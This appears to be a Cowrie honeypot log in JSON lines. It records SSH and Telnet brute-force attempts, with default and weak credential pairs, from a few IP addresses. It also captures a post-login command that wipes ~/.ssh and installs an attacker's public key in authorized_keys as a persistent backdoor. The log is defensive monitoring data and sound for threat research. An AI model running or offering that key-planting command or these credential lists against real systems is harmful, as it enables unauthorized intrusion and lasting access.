{"eventid":"cowrie.session.closed","duration":"297.5","message":"Connection lost after 297.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:29:49.585713Z","src_ip":"212.227.235.229","session":"b5d0ec3f3a42"}
{"eventid":"cowrie.session.closed","duration":"201.8","message":"Connection lost after 201.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:29:49.586200Z","src_ip":"212.227.235.229","session":"d2f7cf858acf"}
{"eventid":"cowrie.session.closed","duration":"123.0","message":"Connection lost after 123.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:29:49.586613Z","src_ip":"212.227.235.229","session":"97d1933923c3"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:29:49.586969Z","src_ip":"212.227.235.229","session":"88f8864a5052"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:29:49.587360Z","src_ip":"212.227.235.229","session":"f091eb35cd41"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:29:49.587852Z","src_ip":"217.72.205.35","session":"375bb53f4ab2"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:29:49.588216Z","src_ip":"212.227.235.229","session":"a4d580bd647d"}
{"eventid":"cowrie.client.version","version":"GET / HTTP/1.1","message":"Remote SSH version: GET / HTTP/1.1","sensor":"my-vps","timestamp":"2025-09-09T10:29:49.588627Z","src_ip":"212.227.235.229","session":"34c4b475efc1"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:29:49.589202Z","src_ip":"212.227.235.229","session":"34c4b475efc1"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:29:49.620128Z","src_ip":"212.227.235.229","session":"88f8864a5052"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:29:49.620543Z","src_ip":"212.227.235.229","session":"f091eb35cd41"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:29:49.620939Z","src_ip":"212.227.235.229","session":"a4d580bd647d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32776,"dst_ip":"1.2.3.4","dst_port":22,"session":"6edb011c69c6","protocol":"ssh","message":"New connection: 212.227.235.229:32776 (1.2.3.4:22) [session: 6edb011c69c6]","sensor":"my-vps","timestamp":"2025-09-09T10:30:18.847090Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:30:18.852902Z","src_ip":"212.227.235.229","session":"6edb011c69c6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:30:19.112526Z","src_ip":"212.227.235.229","session":"6edb011c69c6"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"changeme","message":"login attempt [postgres/changeme] failed","sensor":"my-vps","timestamp":"2025-09-09T10:30:20.194390Z","src_ip":"212.227.235.229","session":"6edb011c69c6"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:30:21.460661Z","src_ip":"212.227.235.229","session":"6edb011c69c6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59440,"dst_ip":"1.2.3.4","dst_port":22,"session":"a52884cf57ff","protocol":"ssh","message":"New connection: 212.227.235.229:59440 (1.2.3.4:22) [session: a52884cf57ff]","sensor":"my-vps","timestamp":"2025-09-09T10:31:48.120147Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:31:48.125987Z","src_ip":"212.227.235.229","session":"a52884cf57ff"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:31:48.391644Z","src_ip":"212.227.235.229","session":"a52884cf57ff"}
{"eventid":"cowrie.login.failed","username":"webmin","password":"webmin","message":"login attempt [webmin/webmin] failed","sensor":"my-vps","timestamp":"2025-09-09T10:31:49.475918Z","src_ip":"212.227.235.229","session":"a52884cf57ff"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:31:50.787317Z","src_ip":"212.227.235.229","session":"a52884cf57ff"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39070,"dst_ip":"1.2.3.4","dst_port":23,"session":"093f523a7dfd","protocol":"telnet","message":"New connection: 212.227.235.229:39070 (1.2.3.4:23) [session: 093f523a7dfd]","sensor":"my-vps","timestamp":"2025-09-09T10:32:14.402697Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-09-09T10:32:14.619091Z","src_ip":"212.227.235.229","session":"093f523a7dfd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T10:32:14.692616Z","src_ip":"212.227.235.229","session":"093f523a7dfd"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-09-09T10:32:14.695628Z","src_ip":"212.227.235.229","session":"093f523a7dfd"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-09-09T10:32:14.697908Z","src_ip":"212.227.235.229","session":"093f523a7dfd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40380,"dst_ip":"1.2.3.4","dst_port":23,"session":"4759baa0a491","protocol":"telnet","message":"New connection: 212.227.125.160:40380 (1.2.3.4:23) [session: 4759baa0a491]","sensor":"my-vps","timestamp":"2025-09-09T10:33:09.224494Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57868,"dst_ip":"1.2.3.4","dst_port":22,"session":"099d7b3566df","protocol":"ssh","message":"New connection: 212.227.235.229:57868 (1.2.3.4:22) [session: 099d7b3566df]","sensor":"my-vps","timestamp":"2025-09-09T10:33:10.307960Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:33:10.309083Z","src_ip":"212.227.235.229","session":"099d7b3566df"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:33:10.568861Z","src_ip":"212.227.235.229","session":"099d7b3566df"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"!QAZ2wsx3edc","message":"login attempt [ubuntu/!QAZ2wsx3edc] failed","sensor":"my-vps","timestamp":"2025-09-09T10:33:11.653114Z","src_ip":"212.227.235.229","session":"099d7b3566df"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:33:12.912844Z","src_ip":"212.227.235.229","session":"099d7b3566df"}
{"eventid":"cowrie.session.closed","duration":6.267080068588257,"message":"Connection lost after 6 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:33:15.463321Z","src_ip":"212.227.125.160","session":"4759baa0a491"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40698,"dst_ip":"1.2.3.4","dst_port":23,"session":"3bceac94a802","protocol":"telnet","message":"New connection: 212.227.125.160:40698 (1.2.3.4:23) [session: 3bceac94a802]","sensor":"my-vps","timestamp":"2025-09-09T10:33:15.660977Z"}
{"eventid":"cowrie.session.closed","duration":12.813736915588379,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:33:28.474918Z","src_ip":"212.227.125.160","session":"3bceac94a802"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41032,"dst_ip":"1.2.3.4","dst_port":23,"session":"ca05fc8e40de","protocol":"telnet","message":"New connection: 212.227.125.160:41032 (1.2.3.4:23) [session: ca05fc8e40de]","sensor":"my-vps","timestamp":"2025-09-09T10:33:28.684618Z"}
{"eventid":"cowrie.session.closed","duration":16.953724145889282,"message":"Connection lost after 16 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:33:45.638706Z","src_ip":"212.227.125.160","session":"ca05fc8e40de"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41360,"dst_ip":"1.2.3.4","dst_port":23,"session":"442385dee3ee","protocol":"telnet","message":"New connection: 212.227.125.160:41360 (1.2.3.4:23) [session: 442385dee3ee]","sensor":"my-vps","timestamp":"2025-09-09T10:33:45.648946Z"}
{"eventid":"cowrie.session.closed","duration":8.810624837875366,"message":"Connection lost after 8 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:33:54.459283Z","src_ip":"212.227.125.160","session":"442385dee3ee"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41686,"dst_ip":"1.2.3.4","dst_port":23,"session":"f85154a6edaa","protocol":"telnet","message":"New connection: 212.227.125.160:41686 (1.2.3.4:23) [session: f85154a6edaa]","sensor":"my-vps","timestamp":"2025-09-09T10:33:54.658585Z"}
{"eventid":"cowrie.session.closed","duration":12.810256004333496,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:34:07.469007Z","src_ip":"212.227.125.160","session":"f85154a6edaa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42006,"dst_ip":"1.2.3.4","dst_port":23,"session":"8f01c81740a7","protocol":"telnet","message":"New connection: 212.227.125.160:42006 (1.2.3.4:23) [session: 8f01c81740a7]","sensor":"my-vps","timestamp":"2025-09-09T10:34:07.683932Z"}
{"eventid":"cowrie.session.closed","duration":12.826342105865479,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:34:20.510409Z","src_ip":"212.227.125.160","session":"8f01c81740a7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42331,"dst_ip":"1.2.3.4","dst_port":23,"session":"584cb280f2c2","protocol":"telnet","message":"New connection: 212.227.125.160:42331 (1.2.3.4:23) [session: 584cb280f2c2]","sensor":"my-vps","timestamp":"2025-09-09T10:34:20.716132Z"}
{"eventid":"cowrie.session.closed","duration":12.737622261047363,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:34:33.453911Z","src_ip":"212.227.125.160","session":"584cb280f2c2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42637,"dst_ip":"1.2.3.4","dst_port":23,"session":"537a25ce2e96","protocol":"telnet","message":"New connection: 212.227.125.160:42637 (1.2.3.4:23) [session: 537a25ce2e96]","sensor":"my-vps","timestamp":"2025-09-09T10:34:33.650918Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56302,"dst_ip":"1.2.3.4","dst_port":22,"session":"1cd21d72e617","protocol":"ssh","message":"New connection: 212.227.235.229:56302 (1.2.3.4:22) [session: 1cd21d72e617]","sensor":"my-vps","timestamp":"2025-09-09T10:34:36.536594Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:34:36.538559Z","src_ip":"212.227.235.229","session":"1cd21d72e617"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:34:36.795542Z","src_ip":"212.227.235.229","session":"1cd21d72e617"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa88888888","message":"login attempt [root/Aa88888888] succeeded","sensor":"my-vps","timestamp":"2025-09-09T10:34:37.841009Z","src_ip":"212.227.235.229","session":"1cd21d72e617"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T10:34:38.384703Z","src_ip":"212.227.235.229","session":"1cd21d72e617"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T10:34:38.387635Z","src_ip":"212.227.235.229","session":"1cd21d72e617"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T10:34:38.390710Z","src_ip":"212.227.235.229","session":"1cd21d72e617"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:34:38.652124Z","src_ip":"212.227.235.229","session":"1cd21d72e617"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T10:34:45.640357Z","src_ip":"212.227.235.229","session":"1cd21d72e617"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T10:34:45.641271Z","src_ip":"212.227.235.229","session":"1cd21d72e617"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T10:34:45.648105Z","src_ip":"212.227.235.229","session":"1cd21d72e617"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:34:45.648782Z","src_ip":"212.227.235.229","session":"1cd21d72e617"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59398,"dst_ip":"1.2.3.4","dst_port":22,"session":"a6494944c1a9","protocol":"ssh","message":"New connection: 212.227.235.229:59398 (1.2.3.4:22) [session: a6494944c1a9]","sensor":"my-vps","timestamp":"2025-09-09T10:34:45.649935Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:34:45.650381Z","src_ip":"212.227.235.229","session":"a6494944c1a9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:34:45.907987Z","src_ip":"212.227.235.229","session":"a6494944c1a9"}
{"eventid":"cowrie.session.closed","duration":12.808446884155273,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:34:46.459301Z","src_ip":"212.227.125.160","session":"537a25ce2e96"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42980,"dst_ip":"1.2.3.4","dst_port":23,"session":"4321dd5bdadf","protocol":"telnet","message":"New connection: 212.227.125.160:42980 (1.2.3.4:23) [session: 4321dd5bdadf]","sensor":"my-vps","timestamp":"2025-09-09T10:34:46.656011Z"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T10:34:46.949862Z","src_ip":"212.227.235.229","session":"a6494944c1a9"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:34:48.210430Z","src_ip":"212.227.235.229","session":"a6494944c1a9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60458,"dst_ip":"1.2.3.4","dst_port":22,"session":"a46fac14b6d5","protocol":"ssh","message":"New connection: 212.227.235.229:60458 (1.2.3.4:22) [session: a46fac14b6d5]","sensor":"my-vps","timestamp":"2025-09-09T10:34:48.467742Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:34:48.468957Z","src_ip":"212.227.235.229","session":"a46fac14b6d5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:34:48.727797Z","src_ip":"212.227.235.229","session":"a46fac14b6d5"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T10:34:49.801262Z","src_ip":"212.227.235.229","session":"a46fac14b6d5"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:34:50.062848Z","src_ip":"212.227.235.229","session":"a46fac14b6d5"}
